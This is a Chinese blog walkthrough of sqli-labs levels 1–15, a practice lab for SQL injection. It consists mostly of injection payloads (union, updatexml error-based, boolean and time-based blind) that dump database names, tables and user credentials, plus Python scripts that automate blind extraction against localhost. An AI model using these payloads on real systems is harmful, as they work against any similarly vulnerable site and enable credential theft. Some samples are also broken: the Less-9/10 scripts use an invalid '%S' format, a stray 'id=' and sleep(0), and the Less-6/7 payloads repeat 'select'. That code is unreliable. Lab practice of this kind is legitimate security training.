sql注入——sqlilabs1-15

已于 2024-08-06 07:37:15 修改
阅读量874 收藏 30
点赞数 19
分类专栏: 渗透 文章标签: sql 数据库
于 2024-08-06 00:59:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aimnr/article/details/140940444
版权

目录

sql注入靶场练习--sqlilabs

1.less-1​编辑

1.测试发现单引号为逃逸符号

2.确定查询列数为三列

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

2.less-2​编辑

2.确定查询列数为三列

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-3​编辑

2.确定查询列数为三列

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-4​编辑

2.确定查询列数为三列

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-5​编辑

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-6​编辑

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-7​编辑

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-8​编辑

3.注入

​编辑

less-9

3.注入

less-10

3.注入

less-11​编辑

2.确定查询列数为二列

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-12​编辑

3.查询到数据库名

4.查询数据库中的表名

5.查询用户表的列名字

6.查询用户信息

less-13​编辑

3.查询到数据库名

4.查询数据库中的表

5.查询用户表的列名字

6.查询用户信息

less-14​编辑

3.查询到数据库名

4.查询数据库中的表

5.查询用户表的列名字

6.查询用户信息

less-15​编辑

3.注入

sql注入靶场练习--sqlilabs

1.less-1

  • 直接注入

1.测试发现单引号为逃逸符号

id=1' --+ //将后面的语句注释

2.确定查询列数为三列

id=1' order by 3 --+

3.查询到数据库名

  • 得保证id的值不存在

id=100' union select 1, user(), database() --+

4.查询数据库中的表名

id=asdfad' union select 1, 2 , group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--+

5.查询用户表的列名字

id=asdfaf' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+

6.查询用户信息

id=asdfaf' union select 1,group_concat(username), group_concat(password) from users --+

2.less-2

  • 直接注入

  • 就这一关是数字型注入,不需要逃逸其他第一关没有区别

2.确定查询列数为三列

id=1 order by 3 --+

3.查询到数据库名

id=100 union select 1, user(), database() --+

4.查询数据库中的表名

id=1000 union select 1, 2 , group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--+

5.查询用户表的列名字

id=100 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+

6.查询用户信息

id=100 union select 1,group_concat(username), group_concat(password) from users --+

less-3

  • 直接注入

  • 还是一样就逃逸方式不同

2.确定查询列数为三列

id=1') order by 3 --+

3.查询到数据库名

id=100') union select 1, user(), database() --+

4.查询数据库中的表名

id=1000') union select 1, 2 , group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--+

5.查询用户表的列名字

id=100') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+

6.查询用户信息

id=100') union select 1,group_concat(username), group_concat(password) from users --+

less-4

  • 直接注入

  • 还是一样就逃逸方式不同

2.确定查询列数为三列

id=1") order by 3 --+

3.查询到数据库名

id=100") union select 1, user(), database() --+

4.查询数据库中的表名

id=1000") union select 1, 2 , group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--+

5.查询用户表的列名字

id=100") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+

6.查询用户信息

id=100") union select 1,group_concat(username), group_concat(password) from users --+

less-5

  • 报错注入

  • 这里首先用到了updatexml(目标xml文档,xml路径,更新的内容)函数

  • 这只是一个普通的函数但是 updatexml函数具有查询功能 并且会再xpath处查询 你将语法构造错误(~这个符号出现会报错 16进制 0x7e) 然后它就会将他查询的结果已报错的形式显示出来 然后说到concat函数(字符串1,字符串2,字符串。。。。) 在其中放入可执行函数会被执行,ps:需要用()将其包裹如下

3.查询到数据库名

id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

4.查询数据库中的表名

id=1' and updatexml(1,concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'),0x7e),1)--+

5.查询用户表的列名字

id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)--+

6.查询用户信息

id=1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)--+
//由于显示长度有限所以 分段截取

less-6

  • 报错注入

  • 与less5相比只是用双引号闭合了

3.查询到数据库名

id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

4.查询数据库中的表名

id=1" and updatexml(1,concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'),0x7e),1)--+

5.查询用户表的列名字

id=1" and updatexml(1,concat(0x7e,(select  select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)--+

6.查询用户信息

id=1" and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)--+
//由于显示长度有限所以 分段截取

less-7

  • 报错注入

  • 与less5相比只是用 ')) 闭合了

3.查询到数据库名

id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

4.查询数据库中的表名

id=1')) and updatexml(1,concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'),0x7e),1)--+

5.查询用户表的列名字

id=1')) and updatexml(1,concat(0x7e,(select  select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)--+

6.查询用户信息

id=1')) and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)--+
//由于显示长度有限所以 分段截取

less-8

  • 这里可以看到它既没有给查询结果返回,也没有给报错处理,只给了对了打印一句话

  • 盲注:bool盲注

id=1' and 1=1 --+
id=1' and 1=0 --+

  • 同理我们是否也可以通过这判断数据库名的对错来注入出想要的结果,由于可见字符皆有可能,我们发现ascii码更加好比对

id=1' and  ascii(substr(database(),1,1))=115 --+

  • 自己一个一个试效率太低了,试试脚本吧

3.注入

  • 查询数据库名:database()

  • 查询表名:select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'

  • 查询字段名 :select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

  • 查用户信息:select group_concat(username,0x3a,password) from users

import requests
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54",
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
}
url = "http://localhost/sqlilabs/Less-8/index.php"
def get_database(url, yuju, chiShu):        #yuju:查询的sql语句, 次数:查找内容大概有多少字符
    name = ''
    for i in range(1, chiShu):   # 数据字符数量
        maxr = 129          #可见字符ascii范围
        minr = 32
        middle = (minr + maxr) // 2
        while minr < maxr:
            payload = "1' and ascii(substr((%s), %d, 1)) > %d -- " % (yuju, i, middle)
            # print(payload)
            getCS = {"id": payload}
            requestr = requests.get(url, params=getCS, headers=headers)
            if "You are in..........." in requestr.text:
                minr = middle + 1
               # print(True)
            else:
                maxr = middle
               # print(False)
               # print(minr, maxr, middle)
            middle = (minr + maxr) // 2
        name = name + chr(middle)
        print(name)
    print(name)
yuju = input("输入查询语句:")
chishu = int(input('大概查询次数'))
get_database(url, yuju, chishu)

less-9

  • 这里可以看到它既没有给查询结果返回,也没有给报错处理,甚至一句话也没有

  • 盲注:时间盲注

1' and if(ascii(substr(database(), 1, 1)) = 115, sleep(3), 0)--+
// 如果条件正确则停留三秒  这种通过响应时间长短来判断对错的称为时间盲注

3.注入

  • 查询数据库名:database()

  • 查询表名:select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'

  • 查询字段名 :select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

  • 查用户信息:select group_concat(username,0x3a,password) from users

import requests
import time
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54",
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
}
url = "http://localhost/sqlilabs/Less-9/index.php"
def get_database(url, yuju, chiShu):        #yuju:查询的sql语句, 次数:查找内容大概有多少字符
    name = ''
    for i in range(1, chiShu):   # 数据字符数量
        maxr = 129          #可见字符ascii范围
        minr = 32
        middle = (minr + maxr) // 2
        while minr < maxr:
            payload = "id=1' and if(ascii(substr((%S), %d, 1)) > %d, sleep(0), 0) -- " %(yuju, i, middle)
            # print(payload)
            getCS = {"id": payload}
            start_t = time.time()
            requestr = requests.get(url, params=getCS, headers=headers)
            end_t = time.time()
            print(end_t-start_t)
            if end_t - start_t > 1:
                minr = middle + 1
                #print(True)
            else:
                maxr = middle
                #print(False)
            print(minr, maxr, middle)
            middle = (minr + maxr) // 2
            # time.sleep(2)
            if maxr == 32 :
                break
        name = name + chr(middle)
    print(name)
yuju = input("输入查询语句:")
chishu = int(input('大概长度:'))
get_database(url, yuju, chishu)

less-10

  • 这里可以看到它既没有给查询结果返回,也没有给报错处理,甚至一句话也没有

  • 盲注:时间盲注

  • 和less9就逃逸变为了双引号

3.注入

  • 查询数据库名:database()

  • 查询表名:select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'

  • 查询字段名 :select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

  • 查用户信息:select group_concat(username,0x3a,password) from users

import requests
import time
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54",
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
}
url = "http://localhost/sqlilabs/Less-9/index.php"
def get_database(url, yuju, chiShu):        #yuju:查询的sql语句, 次数:查找内容大概有多少字符
    name = ''
    for i in range(1, chiShu):   # 数据字符数量
        maxr = 129          #可见字符ascii范围
        minr = 32
        middle = (minr + maxr) // 2
        while minr < maxr:
            payload = 'id=1" and if(ascii(substr((%S), %d, 1)) > %d, sleep(0), 0) -- ' %(yuju, i, middle)
            # print(payload)
            getCS = {"id": payload}
            start_t = time.time()
            requestr = requests.get(url, params=getCS, headers=headers)
            end_t = time.time()
            print(end_t-start_t)
            if end_t - start_t > 1:
                minr = middle + 1
                #print(True)
            else:
                maxr = middle
                #print(False)
            print(minr, maxr, middle)
            middle = (minr + maxr) // 2
            # time.sleep(2)
            if maxr == 32 :
                break
        name = name + chr(middle)
    print(name)
yuju = input("输入查询语句:")
chishu = int(input('大概长度:'))
get_database(url, yuju, chishu)

less-11

  • 直接注入

2.确定查询列数为二列

admin' order by 2 -- //末尾有空格
admin' order by 3 -- //末尾有空格

3.查询到数据库名

adminn' union select 1,database() --  //末尾有空格

4.查询数据库中的表名

id=asdfad' union select 1, group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--  //末尾有空格

5.查询用户表的列名字

id=asdfaf' union select 1,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'-- //末尾有空格

6.查询用户信息

asdfaf' union select group_concat(username), group_concat(password) from users --  //末尾有空格

less-12

  • 发现和less-11一样 就逃逸改为了 双引号括号

3.查询到数据库名

adminn") union select 1,database() --  //末尾有空格

4.查询数据库中的表名

id=asdfad") union select 1, group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--  //末尾有空格

5.查询用户表的列名字

id=asdfaf") union select 1,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'-- //末尾有空格

6.查询用户信息

asdfaf") union select group_concat(username), group_concat(password) from users --  //末尾有空格

less-13

  • 逃逸改为了 单引号括号

  • 报错注入

3.查询到数据库名

adminn') and updatexml(1,concat(0x7e,(select database()),0x7e), 1) --  //末尾有空格

4.查询数据库中的表

asdfad') and updatexml(1, concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'),0x7e),1)--  //末尾有空格

5.查询用户表的列名字

asdfasdfasf') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)--   //末尾有空格

6.查询用户信息

asdfadf') and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)-- 
//由于显示长度有限所以 分段截取  //末尾有空格

less-14

  • 和less-14一样只是 逃逸改为了 双引号

  • 报错注入

3.查询到数据库名

adminn" and updatexml(1,concat(0x7e,(select database()),0x7e), 1) --  //末尾有空格

4.查询数据库中的表

asdfad" and updatexml(1, concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'),0x7e),1)--  //末尾有空格

5.查询用户表的列名字

asdfasdfasf" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)--   //末尾有空格

6.查询用户信息

asdfadf" and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)-- 
//由于显示长度有限所以 分段截取  //末尾有空格

less-15

  • 没有回显,没有报错,但是有图片变化,bool盲注

3.注入

  • 查询数据库名:database()

  • 查询表名:select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'

  • 查询字段名 :select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

  • 查用户信息:select group_concat(username,0x3a,password) from users

import requests
​
url  = "http://localhost/sqlilabs/Less-15/"
def get_database(url, yuju, chishu):
    name = ''
    for i in range(1, chishu):
        minr = 32
        maxr = 129
        middle = (minr + maxr) // 2
        while minr < maxr :
            data = {"uname": "admin' and ascii(substr((%s), %d, 1)) > %d -- " % (yuju, i, middle), "passwd": "asdfadff"}
            request = requests.post(url, data=data)
            if "flag.jpg" in request.text:
                minr = middle + 1
                #print(True)
            else:
                #print(False)
                maxr = middle
            middle = (minr + maxr) // 2
​
            if maxr == 32:
                break
            # print(middle)
        name = name + chr(middle)
        print(name)
​
yuju = input("输入查询语句:")
chishu = int(input('大概查询次数:'))
get_database(url, yuju, chishu)

城南敢死队
关注
专栏目录
渗透测试SQL注入——Sqlilabs关卡详解
人若有志,就不会在半坡停止。
10-18 1001
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
048 SQL注入实验——sqli-labs-master,sqlmap自动化
鸡蛋炒鸡蛋
03-03 1746
文章目录一:sqli-labs-master的部署二:sqli注入通关2.1:笔记篇2.2:实操过程less-01less-02less-03less-04less-05less-06less-07less-08less-09三:sqlmap自动化注入 一:sqli-labs-master的部署 这里给到大家一个下载地址: sqli-labs-master (访问密码:zUw77A) 下载之后解压之后得到一个文件 把该文件夹放到已经安装好的phpstudy/www文件目录下 如何安装phpstudy,请参
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 936
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
SQL注入——sqli-labs第五关
lizhiiiii的博客
01-29 661
使用floor报错语句注入
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 629
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
SQL注入——sqli-labs第二十四关
lizhiiiii的博客
02-01 618
这一关我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
sql注入——sqlilabs27-36
aimnr的博客
08-15 964
宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为',其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。这里我们发现它在java_imlimentation,在经过exlode函数,以&符为分割,取值,在whitelist过滤他取得是第一个值,
SQL注入——sqli-labs(Less-1)
E-Malon的博客
05-29 275
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sql注入——sqlilabs16-26
aimnr的博客
08-09 881
完整流程大概就是,先判断你有没有cookie,没有就登录,登录通过后设置cookie的uname字段值为用户明,然后二次提交后,再回到这个页面,这次有cookie,就直接到了上面这段代码,发现二次提交时cookie可以改,没有过滤,然后有一个查表的动作,后面有报错语句,利用报错注入。这里报错的意思(你不能在查询user表时,更改表中的数据在同一语句中) 因为这里的注入点时update语句。这里我们看到uname,passwd都有被过滤,但是他对响应信息有一个入库的操作,这里我们可以试试。
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1686
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sql注入sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 595
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
SQL注入——sqli-labs第二十四关_sqli第二十四
m0_60721695的博客
04-08 389
我们在修改密码界面正常填写我们注册的用户名 admin’# 修改密码为12345 然后我们通过断点调试查看一下 参数已经传进去了 效果如下为了方便理解我直接把admin’#输入到username方便看效果如图后面的语句就被我们注释掉了,这个时候我们改的密码就变成了管理员的密码。所以这个时候我们直接用admin作为用户名 用我们改的密码直接登录就可以直接进入管理员账户。
NoSQL之 Redis配置与优化
最新发布
2201_75549363的博客
09-10 1424
Redis(远程字典服务器) 是一个开源的、使用 C 语言编写的 NoSQL 数据库。Redis 基于内存运行并支持持久化,采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 469
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 469
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
SQL 代表什么?SQL 的全称是什么?
程序员学习园地。
09-09 1657
创建表修改表删除表。
被低估的SQL
weixin_61431494的博客
09-03 1862
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值